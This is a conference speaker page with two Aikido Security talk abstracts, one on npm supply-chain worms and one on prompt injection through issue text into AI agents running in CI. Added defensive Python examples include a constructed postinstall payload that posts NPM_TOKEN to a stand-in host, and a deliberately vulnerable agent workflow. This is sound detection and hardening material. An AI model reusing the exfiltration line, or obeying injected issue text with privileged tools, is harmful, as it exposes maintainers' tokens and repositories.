Krakow, Poland, 17 - 19 June 2026

Mackenzie Jackson
Aikido Security

Mackenzie Jackson grew up in a traveling circus in New Zealand (yes, really) and traded juggling fire for something even more dangerous: application security. At Aikido Security, he helps developers understand how hackers actually break things. He’s a former founder and CTO, spoken in 30+ countries, hosts The Disclosure Podcast, and still insists New Zealand makes the best coffee.

Industrialized Supply Chain Attacks in the Age of AI
Conference (INTERMEDIATE level)
Room 3

Supply chain attacks have evolved. What were once isolated package compromises are now automated campaigns that scale through CI pipelines, registries, and stolen tokens.

Over the past year, we uncovered several major incidents that reveal this shift. We exposed the Shai-Hulud self-propagating npm worm, which used stolen maintainer tokens to republish itself across the packages those maintainers controlled. We identified the largest known mass compromise of npm packages, involving debug, chalk and related packages with billions of weekly downloads combined. We also uncovered the backdooring of the official XRP cryptocurrency SDK inside a trusted registry.

Across these investigations, a repeatable pattern emerged:

  • Token theft replaces package compromise as the primary objective
  • CI automation becomes a lateral movement engine
  • Registry trust amplifies small footholds into ecosystem-wide incidents
  • AI tooling lowers the cost and shortens the time needed to generate and refine malware

AI is not only accelerating attackers; it also enables detection. By analyzing publishing behavior and dependency anomalies at scale, we identified propagation patterns that traditional scanners missed.
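A compact form of that kind of publishing-behavior analysis, added here as an illustration and not Aikido's own detection code: it scans a feed of registry publish events for one maintainer account pushing the same newly added install hook and payload into several packages within an hour. That is the shape left behind both by a token-driven mass republish and by a self-propagating worm, so the rule covers both cases described above. The feed, package names, maintainer accounts, payload and timestamps are all constructed; the lifecycle hook names are the real npm ones.

```python
"""Flag worm-like republishing in an npm-style publish feed.

Added illustration, not Aikido's detection code. Rule: one maintainer account
publishes new versions of several packages inside a short window, and every
one of them adds a lifecycle hook that carries an identical payload.
"""
import hashlib
from collections import defaultdict
from datetime import datetime, timedelta

LIFECYCLE_HOOKS = {"preinstall", "install", "postinstall", "prepare"}
WINDOW = timedelta(minutes=60)
MIN_PACKAGES = 3

# Constructed sample data: payload, package names, maintainers and timestamps
# are invented and describe no real package.
PAYLOAD = "fetch('https://example.invalid/c', {method: 'POST', body: process.env.NPM_TOKEN})"
HOOK = {"postinstall": "node bundle.js"}

PUBLISHES = [
    # earlier versions: no lifecycle hooks at all
    {"pkg": "ansi-styles-x", "ver": "6.2.0", "ts": "2026-01-05T09:00:00Z", "by": "maint-a",
     "scripts": {"test": "jest"}, "files": {}},
    {"pkg": "color-name-x", "ver": "1.1.0", "ts": "2026-01-05T09:05:00Z", "by": "maint-a",
     "scripts": {}, "files": {}},
    {"pkg": "strip-ansi-x", "ver": "7.1.0", "ts": "2026-01-05T09:10:00Z", "by": "maint-a",
     "scripts": {"test": "jest"}, "files": {}},
    {"pkg": "supports-color-x", "ver": "9.4.0", "ts": "2026-01-05T09:15:00Z", "by": "maint-a",
     "scripts": {}, "files": {}},
    # a stolen token republishes the account's packages with the same hook and payload
    {"pkg": "ansi-styles-x", "ver": "6.2.1", "ts": "2026-01-05T13:00:00Z", "by": "maint-a",
     "scripts": {"test": "jest", **HOOK}, "files": {"bundle.js": PAYLOAD}},
    {"pkg": "color-name-x", "ver": "1.1.1", "ts": "2026-01-05T13:04:00Z", "by": "maint-a",
     "scripts": dict(HOOK), "files": {"bundle.js": PAYLOAD}},
    {"pkg": "strip-ansi-x", "ver": "7.1.1", "ts": "2026-01-05T13:09:00Z", "by": "maint-a",
     "scripts": {"test": "jest", **HOOK}, "files": {"bundle.js": PAYLOAD}},
    {"pkg": "supports-color-x", "ver": "9.4.1", "ts": "2026-01-05T13:15:00Z", "by": "maint-a",
     "scripts": dict(HOOK), "files": {"bundle.js": PAYLOAD}},
    # an unrelated maintainer adding a genuine native-build hook to a single package
    {"pkg": "native-addon-x", "ver": "2.0.0", "ts": "2026-01-05T13:10:00Z", "by": "maint-b",
     "scripts": {"install": "node-gyp rebuild"}, "files": {}},
]


def parse_ts(s):
    return datetime.strptime(s, "%Y-%m-%dT%H:%M:%SZ")


def payload_signature(added_hooks, files):
    """Fingerprint of what the new version adds to the install step.

    Hashing every shipped file is a simplification; a real pipeline would hash
    only the files the hook command actually references.
    """
    h = hashlib.sha256()
    for name in sorted(added_hooks):
        h.update(f"{name}={added_hooks[name]}\n".encode())
    for name in sorted(files):
        h.update(f"{name}:{files[name]}\n".encode())
    return h.hexdigest()[:16]


def new_lifecycle_hooks(publishes):
    """Yield (event, added) for versions that introduce a hook the previous version lacked."""
    prior = {}
    for ev in sorted(publishes, key=lambda e: e["ts"]):   # ISO timestamps sort as strings
        before = prior.get(ev["pkg"], {})
        added = {k: v for k, v in ev["scripts"].items()
                 if k in LIFECYCLE_HOOKS and k not in before}
        prior[ev["pkg"]] = ev["scripts"]
        if added:
            yield ev, added


def detect_propagation(publishes, window=WINDOW, min_packages=MIN_PACKAGES):
    """One alert per (maintainer, payload) that lands in >= min_packages packages within window."""
    groups = defaultdict(list)
    for ev, added in new_lifecycle_hooks(publishes):
        sig = payload_signature(added, ev["files"])
        groups[(ev["by"], sig)].append((parse_ts(ev["ts"]), ev["pkg"], ev["ver"]))
    alerts = []
    for (by, sig), hits in groups.items():
        hits.sort()
        for i in range(len(hits)):
            j = i
            while j + 1 < len(hits) and hits[j + 1][0] - hits[i][0] <= window:
                j += 1                                    # extend the window from hits[i]
            pkgs = sorted({p for _, p, _ in hits[i:j + 1]})
            if len(pkgs) >= min_packages:
                alerts.append({"maintainer": by, "payload": sig, "packages": pkgs,
                               "first": hits[i][0].isoformat(), "last": hits[j][0].isoformat()})
                break
    return alerts


if __name__ == "__main__":
    for a in detect_propagation(PUBLISHES):
        print(f"{a['maintainer']} pushed payload {a['payload']} into {len(a['packages'])} "
              f"packages between {a['first']} and {a['last']}: {', '.join(a['packages'])}")
```

The single legitimate hook added by the second maintainer is not flagged, because the rule keys on repetition of one payload across packages under one account, not on the presence of an install hook. A per-package scanner sees each of those publishes in isolation and has nothing to compare against; the signal only exists at the account level.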

This session breaks down how these attacks work and what engineers must redesign: limiting token blast radius, hardening CI workflows, strengthening registry controls, and using AI-assisted detection to counter automated threats.

Supply chain security now moves at machine speed. Defense must too.

Prompt Injection in CI/CD: When AI Agents Execute Untrusted Input
Conference - Short (INTERMEDIATE level)
Room 2

AI agents are rapidly being embedded into CI/CD pipelines to triage issues, review pull requests, and automate development workflows. When those agents run with repository write access, shell execution, and privileged tokens, a new attack surface emerges.

Our team uncovered a vulnerability pattern in real-world GitHub Actions workflows, including Google’s Gemini CLI integration, where prompt injection allowed untrusted input to influence privileged automation. By embedding malicious instructions inside issue titles or pull request descriptions, attackers could trigger shell commands, access secrets, and manipulate repository state through the AI agent itself.

This exposed a structural flaw in how AI agents are integrated into CI systems. When untrusted text is combined with high-privilege tooling, the agent effectively becomes a command interpreter.

In this session, we break down:

  • How prompt injection leads to tool invocation inside CI
  • Why AI agents amplify trust boundary mistakes
  • The full exploitation chain from issue text to shell access
  • Architectural controls to prevent similar failures

We conclude with practical engineering guidance: isolating privileges, constraining tool access, separating trust boundaries, and designing CI systems that remain secure even with embedded AI.
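One way to mechanize the "separate trust boundaries" rule above, added here as an example and not Aikido's or Google's code: a small linter that flags any GitHub Actions job that both interpolates attacker-controlled event text (issue or pull request titles and bodies, comments, reviews) and holds write permissions, run over a constructed vulnerable workflow and its hardened counterpart. The action name example/ai-agent@v1 and its allow_shell input are hypothetical placeholders; the permissions keys and github.event expressions are real GitHub Actions syntax.

```python
"""Flag GitHub Actions jobs that read attacker-controlled text while able to write.

Added example, not Aikido's or Google's tooling. Text matching only (no YAML
library), so treat it as a triage heuristic rather than a parser.
"""
import re

# Event fields anyone can set by opening an issue or PR or leaving a comment.
UNTRUSTED_TEXT = re.compile(
    r"github\.event\.(issue|pull_request|comment|review|discussion)\.(title|body)\b")
# 'permissions: write-all' or any per-scope grant such as 'contents: write'.
WRITE_GRANT = re.compile(r"^\s*(permissions:\s*write-all|[\w-]+:\s*write)\s*(#.*)?$", re.M)
JOB_HEADER = re.compile(r"^  ([\w-]+):\s*(#.*)?$")   # job ids sit two spaces under 'jobs:'


def split_jobs(jobs_text):
    """Map job id -> that job's lines."""
    jobs, current = {}, None
    for line in jobs_text.splitlines():
        m = JOB_HEADER.match(line)
        if m:
            current = m.group(1)
            jobs[current] = []
        elif current is not None:
            jobs[current].append(line)
    return {name: "\n".join(lines) for name, lines in jobs.items()}


def analyze(workflow):
    """Return (job, expressions, reason) for every job that sees untrusted text and can write."""
    head, sep, tail = workflow.partition("\njobs:")
    if not sep:
        return []
    top_declared = re.search(r"^permissions:", head, re.M) is not None
    top_write = WRITE_GRANT.search(head) is not None
    findings = []
    for name, text in split_jobs(tail).items():
        exprs = sorted({m.group(0) for m in UNTRUSTED_TEXT.finditer(text)})
        if not exprs:
            continue                    # never sees untrusted text, so it may be privileged
        if re.search(r"^    permissions:", text, re.M):
            privileged = WRITE_GRANT.search(text) is not None
            reason = "job-level permissions grant write"
        elif top_declared:
            privileged = top_write
            reason = "job inherits workflow-level write permissions"
        else:
            privileged = True           # undeclared: GITHUB_TOKEN gets the repository default
            reason = "no permissions block; GITHUB_TOKEN may default to read/write"
        if privileged:
            findings.append((name, exprs, reason))
    return findings


# Constructed workflows; example/ai-agent@v1 and its allow_shell input are hypothetical.
# VULNERABLE hands issue text to a shell-capable agent that inherits write-all.
VULNERABLE = """\
on: issues
permissions: write-all
jobs:
  triage:
    runs-on: ubuntu-latest
    steps:
      - uses: example/ai-agent@v1
        with:
          allow_shell: true
          prompt: |
            Triage and, if you can, fix this issue:
            ${{ github.event.issue.title }}
            ${{ github.event.issue.body }}
"""

# HARDENED: the job that reads the text can only read; the job that can write
# never sees the text and validates the one label it receives.
HARDENED = """\
on: issues
permissions: {}
jobs:
  classify:
    runs-on: ubuntu-latest
    permissions:
      issues: read
    outputs:
      label: ${{ steps.agent.outputs.label }}
    steps:
      - id: agent
        uses: example/ai-agent@v1
        with:
          allow_shell: false
          prompt: Classify the issue text in $ISSUE_BODY as bug, feature or question.
        env:
          ISSUE_BODY: ${{ github.event.issue.body }}
  apply:
    needs: classify
    runs-on: ubuntu-latest
    permissions:
      issues: write
    steps:
      - env:
          GH_TOKEN: ${{ secrets.GITHUB_TOKEN }}
          ISSUE: ${{ github.event.issue.number }}
          LABEL: ${{ needs.classify.outputs.label }}
        run: |
          case "$LABEL" in bug|feature|question) ;; *) echo "unexpected label"; exit 1 ;; esac
          gh issue edit "$ISSUE" --add-label "$LABEL"
"""
```

The hardened layout is the point, not the regexes: the agent that reads the issue can only read, its entire output is one label, and the job that can write checks that label against an allowlist before touching anything. Because this is a text heuristic it does not follow reusable workflows or composite actions, and it cannot see the repository's default token permissions, which is why an undeclared permissions block is reported rather than assumed safe.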

AI is becoming part of build infrastructure. Security architecture must evolve with it.




Venue address

ICE Krakow, ul. Marii Konopnickiej 17

Phone

+48 691 793 877

Email

info@devoxx.pl
